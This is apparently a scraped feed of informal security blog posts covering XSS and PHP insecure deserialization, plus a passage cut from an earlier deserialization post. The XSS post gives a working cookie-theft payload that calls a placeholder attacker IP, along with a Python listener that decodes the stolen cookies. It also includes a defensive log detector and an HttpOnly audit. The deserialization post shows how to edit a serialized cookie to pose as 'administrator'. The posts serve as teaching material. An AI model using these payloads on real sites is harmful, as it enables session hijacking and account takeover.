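    clean = {k: v for k, v in ATTACK_BODY.items() if k != "role"}
    print(handle_post_users(clean)[1]["user"].role)  # user
```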

OK, so this is it. I'm gonna write my research paper on insecure deserialization.

]]>
<![CDATA[Cross site scripting | Isuk4]]>So lets begin

]]>
http://localhost:2368/cross-site-scripting-isuk4/65eda9f21fdbf5177cf03143Sun, 10 Mar 2024 12:41:26 GMT

So let's begin.

What is cross-site scripting

If a website directly renders user input, it can end up executing HTML or JS code; that's what we call XSS, or cross-site scripting.

How it can be dangerous

  1. Code Execution: One of the primary dangers of XSS is that it allows attackers to execute arbitrary code in the context of a user’s browser. This means the attacker can perform actions on behalf of the user, such as stealing sensitive information (like login credentials or session tokens), manipulating the appearance of the web page, or performing actions on the user’s behalf without their consent.
  2. Session Hijacking: By stealing session cookies through XSS, an attacker can impersonate a legitimate user and gain unauthorized access to their accounts. This could lead to account compromise and unauthorized actions on the victim’s behalf.
  3. Data Theft: XSS can be used to extract sensitive data from a user’s browser. For example, an attacker might craft a malicious script that sends user data (such as passwords or personal information) to a server under the attacker’s control.
  4. Phishing Attacks: XSS can be employed to create realistic-looking phishing pages. When users unknowingly interact with these pages, their login credentials or other sensitive information can be captured by the attacker.
  5. Drive-by Downloads: In some cases, XSS can be used to deliver malicious payloads, such as malware or other exploit code, to a user’s system. This can lead to further compromises beyond the scope of the web application.
  6. Defacement: XSS can be used to deface websites, altering the appearance of the site to spread political or ideological messages, causing reputational damage to the affected organization.
  7. SEO Poisoning: Attackers can use XSS to inject links or content that manipulates search engine rankings, redirecting users to malicious websites or spreading malware.

OK, I'm gonna explain the three main types.

Main three types of XSS

  • Stored XSS (Persistent XSS): In this type, the malicious script is permanently stored on the target server, often in a database. When a user accesses a particular page or resource containing the injected script, it is retrieved and executed in their browser.
  • Reflected XSS (Non-Persistent XSS): In this case, the malicious script is embedded in a URL or another input, and it is immediately reflected back to the user. The attack is typically carried out by tricking the user into clicking on a crafted link that contains the malicious payload.
  • DOM-based XSS: This occurs when the DOM (Document Object Model) is manipulated by malicious scripts on the client side. The attack takes place within the Document Object Model, and the injected script is processed by the client’s browser.

DOM Invader

DOM Invader is a tool made by PortSwigger that can read DOM data in a web page. So what does that do for us? 😑

If it can find DOM data, it can find DOM-based XSS too.

So let me give you an example.

Hmm, it's like it searches for the text "Isuk4" in the DOM.

So I searched to check whether DOM Invader could find that text in the DOM, and it found it. Yeeey 😉

So when I click exploit, booom 💥💥

Cross site scripting | Isuk4

So like we talked about plenty of thing.mmm and I think we need to talk about Cookie with xss.

Cookie stealing with XSS

So I think you know that JS can read cookie values. Bro, if you don't know, just type alert(document.cookie); in your browser console.


Ok, now you know, so let's write a script for it, baby.

from http.server import BaseHTTPRequestHandler, HTTPServer
import base64
from urllib.parse import urlparse, parse_qs

class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):

        parsed_url = urlparse(self.path)
        query_params = parse_qs(parsed_url.query)

        if 'data' in query_params:
            original_data = query_params['data'][0]

            try:
                data = base64.b64decode(original_data.encode('utf-8')).decode('utf-8')
                print("Received request:")
                print("cookie:", data)

                self.send_response(200)
                self.end_headers()
            except Exception as e:
                self.send_response(500)
                self.end_headers()
                self.wfile.write(f"Error processing request: {str(e)}".encode('utf-8'))
        else:
            self.send_response(400)
            self.end_headers()
            self.wfile.write("Missing 'data' parameter in the URL.".encode('utf-8'))

if __name__ == '__main__':
    server_address = ('', 8000)
    httpd = HTTPServer(server_address, RequestHandler)
    print('Server running on port 8000...')
    httpd.serve_forever()

Run this code and trigger the XSS with a payload like

<script>fetch('http://<ip>:8000/?data='+btoa(document.cookie));</script>

(replace <ip> with the address the Python server above is listening on).
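From the other side of the fence, this pattern is easy both to stop and to spot. The script above only works because the session cookie is readable from document.cookie, which the HttpOnly flag prevents, and the exfil request leaves a base64 blob in the access log that decodes to name=value pairs. The Python below is an added example written for this post (not the author's code): it runs a detector over constructed log lines (sample data, not real traffic) and audits a Set-Cookie header for cookies JavaScript could read. The function names and the log format (Common Log Format) are my assumptions.

```python
import base64
import binascii
import re
from http.cookies import SimpleCookie
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Request line inside a Common Log Format entry, e.g. "GET /?data=... HTTP/1.1"
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A decoded value that looks like document.cookie output: name=value pairs split by ";"
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_COOKIE_PAIRS = re.compile(rf"^\s*{_TOKEN}=[^;]*(?:;\s*{_TOKEN}=[^;]*)*\s*$")


def _log_line(ip: str, path: str) -> str:
    """Build a constructed access-log entry (sample data, not real traffic)."""
    return f'{ip} - - [29/Mar/2024:04:30:17 +0000] "GET {path} HTTP/1.1" 200 0'


# Constructed sample log: one normal request, one exfiltration-style request
# carrying base64 cookie pairs, and one base64 request that is not cookie data.
SAMPLE_LOG = [
    _log_line("203.0.113.5", "/index.html"),
    _log_line("203.0.113.5", "/?data=" + base64.b64encode(b"session=abc123; theme=dark").decode()),
    _log_line("203.0.113.7", "/?data=" + base64.b64encode(b"hello world").decode()),
]


def decode_exfil_param(path: str) -> Optional[str]:
    """Return the decoded `data` query value, or None if absent or not valid base64/UTF-8."""
    params = parse_qs(urlsplit(path).query)
    if "data" not in params:
        return None
    # btoa() output may contain "+", which parse_qs turns into a space; undo that.
    token = params["data"][0].replace(" ", "+")
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_cookie_exfil(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Flag (client_ip, decoded_value) for requests whose `data` param decodes to cookie pairs."""
    hits = []
    for line in log_lines:
        match = _REQ.search(line)
        if not match:
            continue
        decoded = decode_exfil_param(match.group(1))
        if decoded is not None and _COOKIE_PAIRS.match(decoded):
            hits.append((line.split(" ", 1)[0], decoded))
    return hits


def audit_set_cookie(header_value: str) -> List[str]:
    """Names of cookies in a Set-Cookie header value that lack HttpOnly,
    i.e. that document.cookie (and so the payload above) can read."""
    jar = SimpleCookie()
    jar.load(header_value)
    return [name for name, morsel in jar.items() if not morsel["httponly"]]


if __name__ == "__main__":
    for ip, cookies in find_cookie_exfil(SAMPLE_LOG):
        print(f"possible cookie exfiltration from {ip}: {cookies!r}")
    print("readable by JS:", audit_set_cookie("session=abc123; Path=/"))
    print("readable by JS:", audit_set_cookie("session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/"))
```

The detector is deliberately narrow (only the `data` parameter, only base64 that decodes to cookie-shaped text), which keeps false positives low on real logs; widening it to other parameter names is a one-line change. On the mitigation side, a session cookie set with HttpOnly never appears in document.cookie, so the payload above exfiltrates nothing useful even when the XSS itself is still there.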

echo "GGS!Ima off";

GGS!Ima off

]]>
<![CDATA[Secrets about Gadget chains🤫]]>
http://localhost:2368/php-object-injection-poi/65eda7d11fdbf5177cf03133Sun, 10 Mar 2024 12:31:12 GMT

Yo Yo Homies, I'm back with another post

So do you remember our last post? We talked about insecure deserialization and PHP object injection (yeah, I know POI is a type of insecure …). So let's continue this.

What is serialization?

Simply, serialization is the process of converting an object into a text format from which it can be restored.

So what's the problem here? Let me explain.

What is insecure deserialization?

When a website or application tries to restore a serialized object into its original object, it can be dangerous. But how? When a serialized object is restored, the object is rebuilt from the data we give it. So if an attacker can put malicious data into that serialized object, that's insecure deserialization.

What is a Gadget chain?

So a gadget chain is a sequence of function calls or code snippets that is crafted maliciously. Hmmm, if you don't understand it, try this example.

Imagine this is cookie data that contains user data, but serialized:

O:6:"Person":2:{s:4:"name";s:5:"Alice";s:3:"age";i:25;}

But how can we exploit it? If I edit this object to access another user, like this:

O:6:"Person":2:{s:4:"name";s:5:"administrator";s:3:"age";i:25;}

it returns an error.

But why? To understand it, we need to understand the serialized data format. In O:6:"Person":2:{...}, O means object, 6 is the byte length of the class name "Person", and 2 is the number of properties. Inside the braces each property is a key followed by a value: s:4:"name" is a string of 4 bytes, s:5:"Alice" is a string of 5 bytes, and i:25 is the integer 25. PHP checks every one of those declared lengths while unserializing.

Ok, I think you understood this.

Now we can see the problem:

O:6:"Person":2:{s:4:"name";s:5:"administrator";s:3:"age";i:25;}

The declared length of the “name” value is wrong: "administrator" has 13 characters, not 5. That's why it returns an error. If we correct it like this

O:6:"Person":2:{s:4:"name";s:13:"administrator";s:3:"age";i:25;}

it won't return any error. So do we need to count characters by hand every time and make this hard to exploit? Naah, we won't. That's why we use phpggc.

So now that I've explained what a gadget chain is, we are gonna make our own gadget chain😲😲


Creating our own Gadget Chain😎

So we know that the name of the class is Person and there are two properties called name and age. So I'm gonna write some PHP code.


<?php

// creating a class
class Person
{
    // creating properties
    public $name;
    public $age;

    public function __construct($name, $age)
    {
        // takes two arguments, $name and $age, and assigns them to the corresponding properties
        $this->name = $name;
        $this->age = $age;
    }
}

// make the object
$person = new Person("administrator", "16");
// get the malicious serialized object
echo serialize($person);

?>

I think you got it. Simply, I just rebuilt the object😂 like you can see in what the serialized data really says. Ok, but if there is a big object, what should we do? In that case we can use automated gadget chain tools such as ysoserial (for Java) and phpggc (for PHP).

Okay, I'm gonna go off, because it's 03:00 now.

echo "GGS!Ima off";

GGS!Ima off

]]>